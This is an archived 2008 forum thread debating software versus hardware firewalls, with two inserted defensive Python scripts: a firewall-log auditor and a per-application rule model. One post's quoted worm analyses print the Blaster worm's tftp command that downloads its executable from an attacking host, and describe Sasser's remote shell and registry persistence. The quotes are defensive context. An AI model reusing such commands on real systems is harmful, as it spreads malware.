Really Needed?


firzen771
November 4th, 2008, 08:12 PM
In the modern age today, is an extra software firewall REALLY needed if you already have a hardware one? 'Cause tbh I don't think a software firewall will stop hackers.

But I'd like to see your reasons why a software firewall is needed? Discuss.

jrmhng
November 4th, 2008, 08:46 PM
If you are just talking about inbound, you won't need an extra one because the XP/Vista firewall will do you fine.

Kerodo
November 4th, 2008, 09:38 PM
-{ Quote: "In the modern age today, is an extra software firewall REALLY needed if you already have a hardware one? 'Cause tbh I don't think a software firewall will stop hackers.

But I'd like to see your reasons why a software firewall is needed? Discuss" }-
This question has been asked over and over, and the answer is always the same. It's up to you. If you have a router, then the only thing a software firewall will do for you is attempt to catch outbound traffic. If that's something you want, then use one, if not, then you don't need it.

Rmus
November 4th, 2008, 09:51 PM
-{ Quote: "... tbh i don't think a software firewall will stop hackers." }-Please explain how hackers can get by a software firewall into your computer.

---

Pseudo
November 4th, 2008, 11:42 PM
-{ Quote: "Please explain how hackers can get by a software firewall into your computer.

---" }-
Personal firewalls won't block much - and the software itself may introduce new vulnerabilities with its own bugs.

"Personal Firewalls" are mostly snake-oil (http://samspade.org/d/firewalls.html).

Rmus
November 5th, 2008, 12:37 AM
You didn't answer my question.

----

sukarof
November 5th, 2008, 12:55 AM
-{ Quote: "Personal firewalls won't block much - and the software itself may introduce new vulnerabilities with its own bugs.

"Personal Firewalls" are mostly snake-oil (http://samspade.org/d/firewalls.html)." }-

But still no explanation of how a hacker can work around a software fw and take control of the computer from the outside without using a trojan 'n' stuff. That would be more convincing info to prove a point for noobs like me.

Btw, even without a firewall it seems to be pretty hard to get infected, ime. I have exposed an unpatched XP to the net for almost two days straight when I wanted to see if it was true that it would take 30 seconds for the worms to do their stuff. Someone told me that most of the incoming bad stuff is blocked at the ISP level anyway, so maybe a hardware firewall is of no more use than a software ditto when it comes to inbound protection?
Isn't it so that even if someone finds open ports on my computer he can't do anything with them unless there is software with bugs that allows commands from the outside?

I would like to play with a hardware firewall but they are way too expensive if I want to utilize all my 100Mbit.

Rmus
November 5th, 2008, 12:55 AM
-{ Quote: "Personal firewalls won't block much - " }-When you look at the current exploits, they are all easily blocked by a firewall. Most recently:

MS08-067 Worm in the wild?
http://isc.sans.org/diary.html?storyid=5275
-{ Quote: "From what I can see, there is scanning that takes place on port 139 to find other machines,
and the exploit takes place over port 445. This is the primary method of spreading.
I would suggest, if you haven't already, to block these ports at your outer firewall. " }-

ms08-067 exploitation by 61.218.147.66
http://isc.sans.org/diary.html?storyid=5288
-{ Quote: "They have sample packets of the exploit and the call back shell. They show an example of libemu's sctest.
They find the exploiting ip 61.218.147.66. That IP is definitely sequentially scanning ip addresses for tcp 445
looking for vulnerable systems..." }-

Any properly configured firewall will block a probe to unauthorized ports. From my log this evening:

[attached firewall log image]
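As an added illustration (not from the original post or the linked ISC diaries), the check Rmus describes, a firewall that drops probes to the RPC/SMB ports, can be verified from the Windows Firewall log. The script below parses constructed sample lines in that log's W3C format, summarises per-source DROPs against ports 135/139/445 and flags any inbound ALLOW on those ports from outside a hypothetical LAN range (192.168.1.0/24); the addresses are RFC 5737 documentation ranges, constructed for the example.

```python
"""Audit a Windows Firewall log for probes against the RPC/SMB ports.
Added example, not from the original post. Log lines are constructed in
the Windows Firewall (pfirewall.log) W3C format; addresses are RFC 5737
documentation ranges."""
import ipaddress
from collections import defaultdict

# Ports the worms named in the thread used: Blaster (135),
# Sasser and MS08-067 (445), plus the MS08-067 scanning phase (139).
WORM_PORTS = {135: "MS-RPC", 139: "NetBIOS-SSN", 445: "SMB"}

# Hypothetical local subnet; anything else is treated as the Internet.
LAN_NETS = [ipaddress.ip_network("192.168.1.0/24")]

SAMPLE_LOG = """\
#Version: 1.5
#Software: Microsoft Windows Firewall
#Fields: date time action protocol src-ip dst-ip src-port dst-port size tcpflags tcpsyn tcpack tcpwin icmptype icmpcode info path
2008-11-05 20:15:01 DROP TCP 198.51.100.7 192.168.1.10 2432 445 48 S 3154729013 0 65535 - - - RECEIVE
2008-11-05 20:15:03 DROP TCP 198.51.100.7 192.168.1.10 2433 139 48 S 3154729014 0 65535 - - - RECEIVE
2008-11-05 20:15:09 DROP TCP 198.51.100.7 192.168.1.10 2434 445 48 S 3154729015 0 65535 - - - RECEIVE
2008-11-05 20:16:40 DROP TCP 203.0.113.55 192.168.1.10 4121 135 48 S 2011932711 0 16384 - - - RECEIVE
2008-11-05 20:17:12 ALLOW TCP 192.168.1.20 192.168.1.10 1054 445 48 S 19347723 0 65535 - - - RECEIVE
2008-11-05 20:18:30 ALLOW TCP 203.0.113.9 192.168.1.10 3390 445 48 S 88112340 0 65535 - - - RECEIVE
2008-11-05 20:19:02 DROP UDP 198.51.100.7 192.168.1.10 1026 1026 404 - - - - - - - RECEIVE
2008-11-05 20:19:45 ALLOW TCP 192.168.1.10 203.0.113.80 1066 80 48 S 77112340 0 65535 - - - SEND
"""


def parse_log(text):
    """Yield one dict per data line, naming columns from the #Fields header."""
    fields = None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("#Fields:"):
            fields = line[len("#Fields:"):].split()
        elif line and not line.startswith("#") and fields is not None:
            parts = line.split()
            if len(parts) == len(fields):   # skip truncated/malformed lines
                yield dict(zip(fields, parts))


def is_lan(addr):
    return any(addr in net for net in LAN_NETS)


def audit(text):
    """Return (probes, exposures).
    probes: per Internet source, which worm ports it hit, how often, when.
    exposures: inbound ALLOW on a worm port from outside the LAN, i.e. the
    'properly configured' check failing."""
    probes = defaultdict(lambda: {"ports": set(), "count": 0,
                                  "first": None, "last": None})
    exposures = []
    for rec in parse_log(text):
        if rec["path"] != "RECEIVE" or rec["protocol"] != "TCP":
            continue
        try:
            port = int(rec["dst-port"])
            src = ipaddress.ip_address(rec["src-ip"])
        except ValueError:
            continue
        if port not in WORM_PORTS or is_lan(src):
            continue
        stamp = f"{rec['date']} {rec['time']}"
        if rec["action"] == "DROP":
            entry = probes[str(src)]
            entry["ports"].add(port)
            entry["count"] += 1
            entry["first"] = entry["first"] or stamp
            entry["last"] = stamp
        elif rec["action"] == "ALLOW":
            exposures.append({"src": str(src), "port": port,
                              "service": WORM_PORTS[port], "time": stamp})
    return dict(probes), exposures


def report(text):
    """One summary line per probing source and one warning per exposure."""
    probes, exposures = audit(text)
    lines = []
    for src, e in sorted(probes.items()):
        ports = ", ".join(f"{p}/{WORM_PORTS[p]}" for p in sorted(e["ports"]))
        lines.append(f"DROPPED {e['count']:3d} probe(s) from {src:15s} to "
                     f"{ports} between {e['first']} and {e['last']}")
    for x in exposures:
        lines.append(f"WARNING inbound {x['service']} ({x['port']}) from "
                     f"{x['src']} was ALLOWED at {x['time']}")
    return lines


if __name__ == "__main__":
    print("\n".join(report(SAMPLE_LOG)))
```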

Rmus
November 5th, 2008, 01:01 AM
-{ Quote: "Btw, even without a firewall it seems to be pretty hard to get infected, ime. I have exposed an unpatched XP to the net for almost two days straight when I wanted to see if it was true that it would take 30 seconds for the worms to do their stuff." }-

I did the same for 4 days w/o a firewall with Win2K several years ago. It's secure if you ensure that all ports are closed -- no services opening ports.

NOT to be recommended, of course, but just to demonstrate that a closed port is a closed port, whether done within the Operating System, or with a firewall. A firewall is a much easier and safer way of doing it for most people.

Kerodo
November 5th, 2008, 12:58 PM
Yep, several of us have done it. I did the same, no firewall at all, on Win2k for over a month, nothing happened. Of course I tweaked a few things so all ports were closed.

And yes, even if ports are open, in order for someone to do anything from the outside, there needs to be a vulnerability in the service holding the port(s) open for anything to be exploited from outside.

And yes, ISPs often do try to block the more commonly exploited ports and traffic, although many do not. You'd have to check your own ISP to be sure.

A router is good enough, and if you're running a software firewall alone, and it's blocking all ports properly, then nothing can get in either, "hacker" or otherwise...

As has been said, a closed port is a closed port...

Rmus
November 5th, 2008, 01:39 PM
Indeed!

Interestingly, back in Win9x days, some people warned of unsecured ports. It just wasn't talked about much in the mainstream media.

Often missing from so many of the sensational articles about the dangers of exploits these days are the simple preventative measures that could avoid such mishaps, negating a zero-day vulnerability. And often, the prevention is just basic firewall security.

In looking back at my notes from a couple of weeks ago when the MS08-067 exploit broke in the news, there is this revealing comment by Microsoft's Michael Howard in his blog of 10/23:

MS08-067 and the SDL
http://blogs.msdn.com/sdl/archive/2008/10/22/ms08-067.aspx
-{ Quote: "We enabled the firewall by default in Windows XP SP2 and later, this was a direct learning from the Blaster worm." }-

The MSBlaster worm exploited Port 135. The Sasser worm a year later exploited Port 445. The recent MS08-067 worm exploits Ports 139, 445.

I agree with your comments about router and software firewall. In my log this morning, from Russia with love:

[attached firewall log image]
______________________________________________________________________________


References

MS RPC, port 135, DCOM buffer overrun and the Blaster worm
http://www.keyfocus.net/kfsensor/help/AdminGuide/adm_RPC.php
-{ Quote: "The Blaster worm attacks a Windows machine by first executing a buffer overrun at port 135 TCP. This causes a vulnerable machine to listen to port 4444 TCP and execute the following command "tftp -i 81.128.17.117 GET msblast.exe". This downloads the worm from the attacking machine. msblast.exe is then executed and the process continues." }-

eEye Digital Security - Research -- ANALYSIS: Sasser Worm
http://research.eeye.com/html/advisories/published/AD20040501.html
-{ Quote: "The worm attempts to connect to TCP port 445.

Similar to the MSBlaster RPC DCOM worm that struck in August of last year, "Sasser" uses a public exploit for the LSA vulnerability in order to obtain a SYSTEM-level command shell on its victims. Once connected to the shell, the worm instructs the machine being attacked to FTP download and then execute a copy of the worm executable... and installs a string value named "avserve.exe" in the registry key HKLM\..\Run

This is a classic technique used by malware to run malicious executable when Windows starts." }-

More detail about MS08-067
http://blogs.technet.com/swi/archive/2008/10/23/More-detail-about-MS08-067.aspx
-{ Quote: "... the attacker must be able to reach the RPC interface to exploit the vulnerability.

If you are behind a perimeter firewall that filters inbound connections to TCP ports 139 and 445,
you will not be reachable from the Internet." }-

Sully
November 5th, 2008, 05:48 PM
The only reason I use a software firewall is to monitor for outbound applications. I want to be the one asking if there is an update. Leaving the fw in rules wizard alerts me to many apps that automatically 'phone home', and then I can stop that behaviour.

I also like a firewall that has a good log. Many times I use this to add a host file entry to something that has no feature to turn off the update portion. Or just sometimes to be curious as to what is going on. My rules are easy, they consist of Allow, Deny or Allow Local.

But I agree overall that they are really not needed with a router or hardware firewall.

Sul.

noone_particular
November 5th, 2008, 08:53 PM
If for some reason I had to choose one, either a software or hardware firewall, I'd choose the software firewall just to have the ability to control traffic for each application. My hardware firewall is a fairly recent addition. I ran just a software firewall for many years with no problems. Nothing ever bypassed it or killed it. The terms "hardware" and "software" are somewhat deceptive when it comes to firewalls. So called hardware firewalls are installed on separate hardware with its own OS, usually Linux based. Software firewalls run in Windows. Both are actually software firewalls. Software firewalls are vulnerable to malware that gets downloaded and run in Windows, attacks from within that are usually the fault of the user. If Windows is clean, the software firewall will do its job.

farmerlee
November 5th, 2008, 11:05 PM
The only reason I use a software firewall is for protection on a LAN. If I'm at home I don't use them, but if I connect somewhere else then I do.

~*Nat*~
November 6th, 2008, 12:33 AM
:) LOL...paranoia ala carte :P ;)
I've been blessed for many years with a FREE software FW...I couldn't ask for a better one. Although I'm sure there ARE better ones out there. I tried a couple of others but couldn't deal with them, as I am not very smart with certain technical things.

So far (knock on wood), I really had no particular problem....I can see when something wants out, unexpectedly or In.

My pc is like 4 years old - never ..uh...reformatted :-[ and with my FW and a couple other security progs, my putie is running fine. (Maybe slightly slow, but age does that to you)

All in all...no hardware Firewall needed. Not for me.
I hug my pc every day for being sooo good to me all those years. :-*
Aeh --- ok...I also pay respect and bow down and ..uhm...thank...him..?....? ...I mean...my faithful PC, OK ! Gee........:doubt: :wacko:

cruser921
November 6th, 2008, 12:43 AM
I just added a software firewall to my computer even though I'm behind a router; my ISP told me it's a good added layer. Just in case something I d-load was infected and my AV did not catch it, my firewall would when it tried to phone home. :) So I see it as an extra layer.

~*Nat*~
November 6th, 2008, 01:01 AM
-{ Quote: "I just added a software firewall to my computer even though I'm behind a router; my ISP told me it's a good added layer. Just in case something I d-load was infected and my AV did not catch it, my firewall would when it tried to phone home. :) So I see it as an extra layer." }-

What kind of ISP do you have, if I may ask...?
Mine never communicates with me...

~*Nat*~
November 6th, 2008, 01:32 AM
Stupid question for all the know-it-alls.
Sorry. :ouch:

???

Mrkvonic
November 6th, 2008, 11:48 AM
Hello,

Why isn't the software fw sufficient? How exactly are the evil matrix hackers gonna get in?

OT, it's a matter of choice; if you want one, use it.

Mrk

alex_s
November 6th, 2008, 07:37 PM
-{ Quote: "In the modern age today, is an extra software firewall REALLY needed if you already have a hardware one? 'Cause tbh I don't think a software firewall will stop hackers.

But I'd like to see your reasons why a software firewall is needed? Discuss" }-

This question arises here every two weeks. Isn't it time to FAQ it? (rhetorical question).

Short answer: it depends. If you have nothing valuable on your computer and can painlessly restore from a backup, then you need nothing but a pure system and backup software.

noone_particular
November 6th, 2008, 09:43 PM
-{ Quote: "but id like to see your reasons why a software firewall is needed? " }-
Not including HIPS components or any other additional functions found in firewall suites, referring to just the internet firewall itself, here are some things a software firewall can do that a hardware firewall can't.

A software firewall can:
Allow one application or program to receive incoming traffic while blocking incoming traffic for all the other software.
Limit one application's internet access to a single IP or range of IPs while allowing another to access any IP.
Prevent applications and system components from connecting to specific IP ranges while allowing them access to all other IPs. Useful for preventing apps from calling home and still giving them internet access. Also blocks adservers from specified IP ranges. Useful for applications that display advertising on the user interface.
Limit individual applications' or system components' internet access to a specific port and/or protocol.
Allow, block or limit local (loopback) connections for individual applications. Useful for forcing the browser to connect through a filtering proxy like Proxomitron. Also defeats some malware.
Alert when a system component, application, or malware tries to access the internet for the first time.
Log internet activity for individual applications.
Quickly block all internet access with one or two clicks on the tray icon.
Verify the MD5 signature of the applications and components seeking internet access and notify the user if they change.

There's plenty more. This is just what I can think of offhand. Software firewalls are extremely useful security tools.

Kerodo
November 6th, 2008, 10:02 PM
-{ Quote: "Not including HIPS components or any other additional functions found in firewall suites, referring to just the internet firewall itself, here are some things a software firewall can do that a hardware firewall can't.

A software firewall can:
Allow one application or program to receive incoming traffic while blocking incoming traffic for all the other software.
Limit one application's internet access to a single IP or range of IPs while allowing another to access any IP.
Prevent applications and system components from connecting to specific IP ranges while allowing them access to all other IPs. Useful for preventing apps from calling home and still giving them internet access. Also blocks adservers from specified IP ranges. Useful for applications that display advertising on the user interface.
Limit individual applications' or system components' internet access to a specific port and/or protocol.
Allow, block or limit local (loopback) connections for individual applications. Useful for forcing the browser to connect through a filtering proxy like Proxomitron. Also defeats some malware.
Alert when a system component, application, or malware tries to access the internet for the first time.
Log internet activity for individual applications.
Quickly block all internet access with one or two clicks on the tray icon.
Verify the MD5 signature of the applications and components seeking internet access and notify the user if they change.

There's plenty more. This is just what I can think of offhand. Software firewalls are extremely useful security tools." }-
Why would you need to do any of that? I dumped 'em years ago and have not missed them since..... no need....

~*Nat*~
November 6th, 2008, 10:32 PM
-{ Quote: "Why isn't the software fw sufficient? How exactly are the evil matrix hacker gonna get in?" }-

-{ Quote: "This question arises here every two weeks. Isn't it time to FAQ it? (rhetorical question)." }-

Indeed a good idea
But this is just ME. I'd never store anything too valuable on the pc.
Just don't trust it, FW, backups or not.

-{ Quote: "There's plenty more. This is just what I can think of offhand. Software firewalls are extremely useful security tools." }-

@ noone_...that's how I believe too.
I also believe in Layered pc protection. Like so many people here do - there's a thread or two - or 3 - 4 (?), about this. A FW and Anti-virus is of course not the only thing we should guard the computer with.
I'm sure you know this though.

noone_particular
November 6th, 2008, 10:48 PM
-{ Quote: "Why would you need to do any of that? I dumped 'em years ago and have not missed them since..... no need...." }-
I did the opposite. I've put strict controls on internet access with Kerio and equally strict controls on processes with SSM. To this I added detailed content filtering with Proxomitron. With these in place, I've removed all AVs, ATs, antispyware, and all other signature based detection software. No need. I don't have any virtualization, sandboxing, or behavior blocking software either. Again, no need.

Arup
November 6th, 2008, 10:49 PM
Been running behind a NAT router with Avira Premium and till now I haven't got infected. Of course I do practice safe surfing and, from time to time, take a netstat reading to see if anything suspicious is going through. A good AV with well designed HIPS is all one needs behind a router; why slow down your traffic and have multiple pop-ups to deal with? Also, firewalls, especially the paranoid ones, put load on the CPU and file subsystem; unless one really surfs on the darker side of the net, it's not really essential.

Kerodo
November 6th, 2008, 10:54 PM
-{ Quote: "I did the opposite. I've put strict controls on internet access with Kerio and equally strict controls on processes with SSM. To this I added detailed content filtering with Proxomitron. With these in place, I've removed all AVs, ATs, antispyware, and all other signature based detection software. No need. I don't have any virtualization, sandboxing, or behavior blocking software either. Again, no need." }-
If you're using Kerio to control outbound, it's virtually useless. It won't stop something determined to get out. SSM is a better choice for catching things, so that's good, but IMO you'd be better off dumping old Kerio and keeping SSM with a router for inbound. Light and just as effective. Using Proxo is fine also if you like that approach. That should keep a lot of browser nasties out....

noone_particular
November 7th, 2008, 12:01 AM
Unless you insist that application firewall functions have to be combined with the internet firewall in one package, Kerio is not useless by any means. Kerio's primary role is internet traffic control, which it does very well. I keep the application firewall functions separate from the internet firewall. SSM handles these and the bulk of the malware control duties. Proxomitron also has a role there. Keeping malware from connecting out is a secondary role for Kerio, one it's not likely to have to perform unless SSM and Proxomitron fail. I have yet to see that happen, just as Kerio has not failed to do what it was designed to. I will not compare Kerio by itself to a security suite. That's like claiming that Thunderbird is inferior to the Internet Explorer package because Thunderbird can't browse the internet, but IE can open e-mail using OE, which comes with it. If you want to compare security suites and packages, I'll put my package and rulesets up against any security suite. How well one component in a suite or package protects you means nothing. Users don't run just one component of a security suite or just one program in a security package. How well the whole package works is what matters.

Kerodo
November 7th, 2008, 12:20 AM
You do have a light setup there, I'll give you that. I just don't quite agree on the effectiveness of Kerio. If you're just using it to control "normal" apps on your system, then fine, but anything remotely "devious" will easily bypass it and find a way out. But then like you say, hopefully SSM will catch it executing before then, but then again, that depends on you, and what you allow to execute when SSM alerts you. If it hides behind something else and/or fools you, then you're dead....

In the end, I think it's mostly up to the user to stay clean and clear of harm. So I run light here with just Avira free and Defender on Vista x64. The router or Win Firewall covers inbound. Outbound or malware I don't worry about 'cause I don't expose myself to it. I have pretty much run this way for years without harm, so it works for me..

To each his own as they say.... ;)

noone_particular
November 7th, 2008, 06:59 PM
On my PCs Kerio controls the internet access for legitimate apps and system components. SSM makes sure that everything running is legitimate. My primary PC changes very little and very seldom. I run SSM with the UI disconnected, no prompts for the unknown. Users can't install or update anything. They get an automatic "access denied" for everything not whitelisted. It's secured by a default-deny security policy that's applied to all applications and system components and includes each one's activities and parent-child settings. The internet access for each application and system executable is also governed by the same policy, each getting only the access it needs to function. Most of them are required to connect through Proxomitron so that the content they receive can be filtered. The operating system itself has no internet access. It doesn't need it and the internet definitely doesn't need any access to my OS. I've found Kerio to be ideal for this role. Kerio's ability to control loopback traffic increases Proxomitron's effectiveness because it won't let apps connect out without going through it.

For me, a software firewall is a necessity, and Kerio is ideally suited to my needs. I've also used this combination for years on several PCs with different operating systems and it has never let me down. It just shows that there's more than one way to make an OS secure.
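As an added example (not Kerio's code nor any poster's), here is a small model of the per-application, default-deny ruleset that noone_particular describes, both in the earlier capability list and in the policy above: rules are evaluated in order with first match winning, the browser may only reach the local filtering proxy over loopback, a media player keeps Internet access but not to an ad-server range, OS components get no Internet access, one program may accept inbound connections on one port, and anything unmatched is denied. Application names, the proxy port (8080) and all address ranges are constructed for the illustration.

```python
"""Per-application, default-deny firewall policy model.
Added example, not Kerio's or any poster's code. Rules are checked in
order, the first match decides, and an unmatched connection is denied."""
from dataclasses import dataclass
from typing import FrozenSet, List, Optional, Tuple
import ipaddress

ANY = None   # wildcard for a rule field


@dataclass(frozen=True)
class Conn:
    app: str            # executable that owns the socket
    direction: str      # "out" (app connects) or "in" (app accepts)
    proto: str          # "tcp" or "udp"
    remote_ip: str
    port: int           # remote port for "out", local listening port for "in"


@dataclass(frozen=True)
class Rule:
    name: str
    action: str                               # "allow" or "deny"
    app: Optional[str] = ANY
    direction: Optional[str] = ANY
    proto: Optional[str] = ANY
    remote: Optional[str] = ANY               # CIDR the remote address must be in
    ports: Optional[FrozenSet[int]] = ANY

    def matches(self, c: Conn) -> bool:
        if self.app is not ANY and self.app.lower() != c.app.lower():
            return False
        if self.direction is not ANY and self.direction != c.direction:
            return False
        if self.proto is not ANY and self.proto != c.proto:
            return False
        if self.remote is not ANY and \
                ipaddress.ip_address(c.remote_ip) not in ipaddress.ip_network(self.remote):
            return False
        if self.ports is not ANY and c.port not in self.ports:
            return False
        return True


def evaluate(rules: List[Rule], c: Conn, block_all: bool = False) -> Tuple[str, str]:
    """Return (action, rule name); block_all models the 'block everything' tray toggle."""
    if block_all:
        return "deny", "block-all"
    for r in rules:
        if r.matches(c):
            return r.action, r.name
    return "deny", "default-deny"


PROXY_PORT = 8080                     # constructed: local filtering proxy port
AD_SERVER_RANGE = "203.0.113.0/24"    # constructed range an app is kept away from

POLICY = [
    # Browser may only talk to the local proxy; any direct connection is refused.
    Rule("browser-to-proxy", "allow", app="firefox.exe", direction="out",
         proto="tcp", remote="127.0.0.1/32", ports=frozenset({PROXY_PORT})),
    Rule("browser-direct", "deny", app="firefox.exe"),
    # The proxy is the only program allowed to fetch web content.
    Rule("proxy-web", "allow", app="proxomitron.exe", direction="out",
         proto="tcp", ports=frozenset({80, 443})),
    # Media player keeps web access but not to the ad-server range.
    Rule("player-no-ads", "deny", app="player.exe", remote=AD_SERVER_RANGE),
    Rule("player-web", "allow", app="player.exe", direction="out",
         proto="tcp", ports=frozenset({80, 443})),
    # One program may accept incoming connections on one port.
    Rule("p2p-listen", "allow", app="p2p.exe", direction="in",
         proto="tcp", ports=frozenset({6881})),
    # OS components get no Internet access at all.
    Rule("os-no-internet", "deny", app="svchost.exe"),
    # Nothing else may use loopback (keeps unknown code off local proxies).
    Rule("no-other-loopback", "deny", remote="127.0.0.0/8"),
]

# Constructed connections that exercise each rule and the default.
SAMPLE_CONNS = [
    Conn("firefox.exe", "out", "tcp", "127.0.0.1", PROXY_PORT),
    Conn("firefox.exe", "out", "tcp", "198.51.100.20", 443),
    Conn("proxomitron.exe", "out", "tcp", "198.51.100.20", 443),
    Conn("player.exe", "out", "tcp", "203.0.113.5", 80),
    Conn("player.exe", "out", "tcp", "198.51.100.20", 80),
    Conn("p2p.exe", "in", "tcp", "198.51.100.77", 6881),
    Conn("svchost.exe", "out", "udp", "198.51.100.1", 53),
    Conn("dropper.exe", "out", "tcp", "198.51.100.9", 80),
]


def decisions(rules=POLICY, conns=SAMPLE_CONNS):
    """(app, remote ip, port, action, rule) for every sample connection."""
    return [(c.app, c.remote_ip, c.port) + evaluate(rules, c) for c in conns]


if __name__ == "__main__":
    for app, ip, port, action, rule in decisions():
        print(f"{action:5s} {app:16s} -> {ip}:{port}  ({rule})")
```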

Kerodo
November 7th, 2008, 09:44 PM
-{ Quote: "On my PCs Kerio controls the internet access for legitimate apps and system components. " }-
Are you talking Kerio 2 or 4? I have used both; I loved 2 and had tons of fun with the rules for a year or so. 4 was ok, but another thing altogether, with a few problems of its own. I prefer 2 myself. Lean and mean....

noone_particular
November 7th, 2008, 09:57 PM
Definitely Kerio 2.1.5. Tried one of the version 4 releases once, don't remember which one. Did not like it at all. It only took a couple of minutes to decide that I wanted nothing to do with it. If only someone would write a modern equivalent of Kerio 2 that fixed a couple of minor bugs, gave it better logging, and made it IPv6 compatible.

Kerodo
November 7th, 2008, 10:26 PM
-{ Quote: "Definitely Kerio 2.1.5. Tried one of the version 4 releases once, don't remember which one. Did not like it at all. It only took a couple of minutes to decide that I wanted nothing to do with it. If only someone would write a modern equivalent of Kerio 2 that fixed a couple of minor bugs, gave it better logging, and made it IPv6 compatible." }-
Yeah, 2 is a classic. There is no better interface for rule making IMO. I doubt anyone will ever make anything close to it again though, sadly enough.. But it's fine as is, it has flaws, but it's good enough. Kerio 2 was what got me into a long haul of trials with firewalls back in 2004. I spent a lot of time on the rules and enjoyed it. In the end though, I slapped the router in place, and let go of it all. I rely mostly on myself to keep nasties out. So far so good....

Seer
November 7th, 2008, 10:43 PM
-{ Quote: "If only someone would write a modern equivalent of Kerio 2 that fixed a couple of minor bugs, gave it better logging, and made it IPv6 compatible." }-

How about Jetico or even Look'n'Stop? Will you guys stop weeping over Kerio already and just move along? (Nothing personal, I'm speaking in general terms)

-{ Quote: "There is no better interface for rule making IMO." }-

As you said, this is only your opinion.

Cheers,

Kerodo
November 7th, 2008, 10:47 PM
-{ Quote: "How about Jetico or even Look'n'Stop? Will you guys stop weeping over Kerio already and just move along? (Nothing personal, I'm speaking in general terms)

As you said, this is only your opinion.

Cheers," }-
Did you really need to say that bubba? Anything written in these forums is the poster's opinion, that's a given.... Lighten up dude...

Jetico is fine too; I was the first to post on it here at Wilders years ago. It's nice, but has its shortcomings also....

Seer
November 7th, 2008, 11:05 PM
-{ Quote: "Did you really need to say that bubba?" }-

Yes I did. I'm pretty much sick of nostalgic posts that lead nowhere and just cry over the "good old times". Quit living in the past.

But the real reason bubba said it is this - the discussion you two started in the last couple of posts is OT and is essentially a hijack, isn't it? Should we end every firewall thread in a 10-forward manner weeping over Kerio or Sygate?

Cheers,

Kerodo
November 7th, 2008, 11:08 PM
-{ Quote: "Yes I did. I'm pretty much sick of nostalgic posts that lead nowhere and just cry over the "good old times". Quit living in the past.

But the real reason bubba said it is this - the discussion you two started in the last couple of posts is OT and is essentially a hijack, isn't it? Should we end every firewall thread in a 10-forward manner weeping over Kerio or Sygate?

Cheers," }-
If you don't like what's being posted, stop reading it..... Simple enough. ;)

Seer
November 7th, 2008, 11:15 PM
-{ Quote: "If you don't like what's being posted, stop reading it....." }-

Um... yeah but... how would I know if I like or dislike something if I haven't read it ???

But perhaps you're right. I should at least refrain from posting. Which I, believe it or not, often do.

Cheers,

BlueZannetti
November 7th, 2008, 11:23 PM
Folks,

Could we keep the discussion centered on the original question? Namely....

-{ Quote: "In the modern age today, is an extra software firewall REALLY needed if you already have a hardware one? 'Cause tbh I don't think a software firewall will stop hackers.

But I'd like to see your reasons why a software firewall is needed?" }-

My own take is no (i.e. not needed, but arguably desirable in many situations), although the phrasing of the question seems to betray a misunderstanding of the functional capabilities of the two approaches.

Blue

Arup
November 7th, 2008, 11:57 PM
For ultimate control we don't have to lament over firewalls of yesteryear; Comodo has now developed into a good alternative to Tiny. It has its fair share of pop-ups but it does cover lots of ground and is among the only ones that are fully x64 OS compatible. However, it's only for those paranoid about leaks etc., as the pop-ups would make your PC experience quite full of pop-ups.

Seer
November 8th, 2008, 12:27 AM
Since we're back on track here, and in line with this

-{ Quote: "but arguably desirable in many situations" }-

I can only tell that a good software firewall is very desirable. Here's an example of something that doesn't happen often (in fact it never happened before) that my router failed to stop. Log entries from Jetico firewall, during a P2P session -

[attached Jetico log screenshot]

(sorry for the big image)
If you (the majority) still think you're well off with a simple state table check that home routers provide, I can only say,

Cheers,

Kerodo
November 8th, 2008, 12:34 AM
-{ Quote: "Since we're back on track here, and in line with this

(sorry for the big image)
If you (the majority) still think you're well off with a simple state table check that home routers provide, I can only say,

Cheers," }-
Just to play devil's advocate here, what exactly is the threat or danger in those packets? Explain how any harm can result from them please...

noone_particular
November 8th, 2008, 12:43 AM
I see no security advantage to having the internet firewall and the application firewall (HIPS) combined into one program. Regardless of whether the security package is a suite or user selected single purpose components, the internet firewall is one component I consider necessary in most any package for many reasons, several of which I mentioned earlier. In security packages centered around sandboxing or virtualization, an application firewall isn't really a necessity, but with most firewall suites, you get one whether you wanted it or not. In packages like these, a separate internet firewall is an asset. It might not be something the masses would want to use, but the average user wouldn't want to deal with Comodo either.

IMO, the internet firewall is the most important security app for keeping your personal data private. Without one, you have very little control over the data that leaves your PC, and no control over where it goes or what app sends it.

Seer
November 8th, 2008, 12:44 AM
Kerodo,

I am not talking of danger but of proper packet filtering. As you know, there is a distinct difference. Sure, you won't be in danger even without a router, connected directly to the internet, if all your ports are closed. Even if some are open, with patched applications holding them you are not in danger. You know this as well.

It is just a matter of unsolicited packets arriving at my stack - I won't have this even if it doesn't pose any risk. Most of you will disregard my opinion as you're thinking only how to get your a$$es out of trouble. And I do understand you, I simply have a slightly different point of view.

Cheers,

Kerodo
November 8th, 2008, 12:47 AM
-{ Quote: "Kerodo,

I am not talking of danger but of proper packet filtering. As you know, there is a distinct difference. Sure, you won't be in danger even without a router, connected directly to the internet, if all your ports are closed. Even if some are open, with patched applications holding them you are not in danger. You know this as well.

" }-
Alright, that's fine, I understand where you're coming from.....

Arup
November 8th, 2008, 01:00 AM
P2P needs port forwarding, which means letting in inbound traffic; your router has no control over that as you have opened the hole in it by choice. In that case even a software firewall would be able to do nothing, as P2P needs to be a server. That's the vagaries of P2P and you have to live with it; all you can do is run an IP filter or Peer Guardian, which would stop most of the inbound rogue traffic.

Rmus
November 8th, 2008, 01:01 AM
-{ Quote: "IMO, the internet firewall is the most important security app for keeping your personal data private. Without one, you have very little control over the data that leaves your PC, and no control over where it goes or what app sends it." }-

1) Successful XSS exploits will send data via the browser, and the firewall will happily oblige.

2) Regarding other applications sending via malware exploits: What about users who are confident that no malware can intrude to send out data?

There are other ways than a firewall to control what goes on in one's computer.

----

Seer
November 8th, 2008, 01:14 AM
-{ Quote: "P2P needs port forwarding, which means letting in inbound traffic; your router has no control over that as you have opened the hole in it by choice. In that case even a software firewall would be able to do nothing, as P2P needs to be a server. That's the vagaries of P2P and you have to live with it; all you can do is run an IP filter or Peer Guardian, which would stop most of the inbound rogue traffic." }-

Arup,

when you P2P you would need to forward port(s) in your software firewall as well. So the software firewall will also pass the unsolicited through. This is a must if you want to P2P, as you said.
